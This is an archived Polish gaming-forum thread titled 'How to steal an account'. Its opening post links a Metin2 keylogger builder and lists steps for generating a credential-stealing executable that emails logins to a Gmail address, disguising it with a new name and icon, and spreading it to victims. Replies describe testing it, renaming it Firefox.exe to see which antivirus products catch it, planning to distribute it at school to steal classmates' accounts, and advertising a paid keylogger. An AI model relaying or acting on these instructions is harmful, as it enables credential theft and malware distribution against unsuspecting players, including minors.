Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Jak Ukrasc Konto

wegorz70

Rekomendowane odpowiedzi

Opublikowano

Witam!

Dziś pokaże jak komuś odebrać/zawinąć/przechwycić konto.

Zastrzegam sobie wszystkie prawa autorskie, jeśli ktoś chce dać na inne forum poradnik proszę

o kontak.

Ściągamy plik:

htp://www.4shared.com/file/109435056/29fd6804/M2_Keylogger_Up_By_MrCybucH.html

Scan:

htp://virusscan.jotti.org/pl/scanresult/8f08c5a4db39371c8a4aaa31e5df155e9f2902ef/9d0af78c0270cddb4d3f3157306518063e50edb3

Instrukcja:

1.Rozpakowywujemy plik

2.Odpalamy "Konfigurator Serwera.exe"

3.Wpisujemy e-mail (musi byc na gmailu)

4.Naciskamy " Generuj Serwer! "

5.Jesli wszystko zrobimy dobrze powinien sie nam ukazac napis " Serwer Wygenerowany poprawnie! "

6.Teraz pownna pojawic sie ikonka metin2 z napisem " serwer "

7.Możemy teraz zmieniać nazwę, ikony co chcemy

8.Odpalamy plik i się włącza keylogger

9.Wysyłamy/wrzucamy na stronę ktoś ściąga odpala, i po czasie przychodzi wszystko na e-mail podany przy generowaniu.

Nie pisać głupich postów, i scgasz na własną odpowiedzialność.

by wegorz70

Opublikowano

trudno zeby key nie mial wirow tak musi byc

na forum zabrania sie wrzucania takiego syfu

Opublikowano

tam jest tlyko program do tworzenia keya ale dałem koledze przez gg żeby spradzić czy działa zalogował się i od wczoraj nic na email nie przyszło

Opublikowano

mnie tam wali:D mam 5 lvl, wlaczylem zgodnie z poradnikiem, zrobilem maila na gmail.com itp wygenerowalem serwer.exe

włączyłem serwer.exe zalogowałem sie do gry i na maila i mi zadne passy nie przyszly; >

xxx

Opublikowano

Polecam mi dziala (sprawdzalem na sobie i gdy wlaczam Serwer nic sie nie dzieje i mam wlaczony proces tego keyllogera, wylaczylem go i jest git) nie wiem czy przychadza passy na email bo jeszcze zadne nie przyszly, :s

b_560x95.png

b_560x95.png

Opublikowano
Wiec jak wam moga przyjsc pasy na maila jak nie wlaczyliscie gry i nie wlogowaliscie sie na konto ?

musze cie rozczarowac, wlaczylem gre i zalogowalem sie na konto-,- i jakos mi nie przyszly passy na maila

PS: pomysl na drugi raz

Nie pomogłem :] nie dam 5*;]

xxx

Opublikowano

jak cie nie interesuje ze innym nie działa, to na chuj sobie nabijasz posty ? zeby sie pochwalic ze ci dziala ? chlopcze... ogarnij głowe i zanim napiszesz, pomysl 10 razy

xxx

Opublikowano

yy ja musze kolege co to wstawił bronic bo drzecie sie ze trojany no ale programy do hakowania ludzi są robione na bazie trojana ;/

chcę ci podziękować mamo

chcę ci podziękować tato

za prowadzenie tego pieprzonego świata

do gorzkiego końca

nigdy nienawidziłem naprawdę jedynego, prawdziwego boga

ale boga ludzi, których nienawidzę

mówisz że chcesz ewolucji

małpa była wielkim uderzeniem

mówisz, ze chcesz ewolucji, człowieku

a ja mówię, że jesteś pełen gówna

LAST+Tour+on+Earth.jpg

Opublikowano

packetreaver.com n00by ... szkoda 50zl na keyloggra (3mies) a gwarancja 100%? Pozdro... kilka dni chipsow nie kupisz to sie swiat zarwie?

Opublikowano
packetreaver.com n00by ... szkoda 50zl na keyloggra (3mies) a gwarancja 100%? Pozdro... kilka dni chipsow nie kupisz to sie swiat zarwie?

Dobre

tylko, ze w jeden dzien zrobie dobrego keylogera w delphi, i 75% userow tego forum.

Opublikowano

E-maile nie przychodza bo to stary key i nie wiem jak to nazwac hosting ? od wysyłania e-maili padł wpiszcie w google metin2 stealer i przeczytajcie co autor napisał na jednym 4um

Opublikowano

Ja mam w domu kompa i laptopa wiec zrobiłem doświadczenie

zrobiłem konto na gmail.com OK potem zrobiłem na kompie tego serwer.exe i zmieniłem nazwę na Firefox.exe i ikonę zmieniłem potem ten plik dałem do laptopa

(na laptopie specjalnie uruchomiłem NOD32, Avast, Spyware Doctor więc:

NOD 32- Nic

Avast- Nic

Spyware Doctor- znaleziony keylogger podanny do kwaratanny)

i na laptopie uruchomiłem ten Plik i przy uruchomionym NOD32, zalogowałem sie do metin2 i nic nie przyszło... potem znów uruchomiłem ten plik ale przy Avast i okazało się ze na emial przyszła wiadomość bez nazwy (pewnie SPACJA+ENTER) i w wiadomości jest tylko napisane id i haslo i jednak działa

WNIOSEK Z DOŚWIADCZENIA: okazało sie ze keylogger działa ale przy nod32 nic nie wykrywał ale blokuje plikowi dostęp do internetu a w avast nie blikuje nie wiem co będzie z innymi antywirusami

teraz ide do szkoły dać ten keylogger bo tam każdy gra w metin2 i będę miał i konta

nq

Edit@

Chce dodac ze na Kompie mam Windows XP a na laptopie Win 7

Opublikowano

Trzeba być jakimś ułomem aby ściągać od kogoś key'a. ^^

Takie programy w waszym komputerze nie będą uznawane u was za pasożyta, a tak na prawdę będzie co chwila wysyłało dane od "cheatera" do "hackera".

No bo po jakiego ktoś obeznany w tej sztuce ma się dzielić pomysłami? Tak, żeby okradać więcej ludzi sprytem.

Opublikowano

heh nizłe ale i dupy bo stracisz konto zanim sie obejzysz ...

Koniec z Metinem ; ) Było fajnie, ale wyszłem z tego Nałogu

Pozdro All ; )

Opublikowano
Trzeba być jakimś ułomem aby ściągać od kogoś key'a. ^^

Takie programy w waszym komputerze nie będą uznawane u was za pasożyta, a tak na prawdę będzie co chwila wysyłało dane od "cheatera" do "hackera".

No bo po jakiego ktoś obeznany w tej sztuce ma się dzielić pomysłami? Tak, żeby okradać więcej ludzi sprytem.

Bo nie wszyscy sa tacy jak ty, czyli lekko mowiac samoluby.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...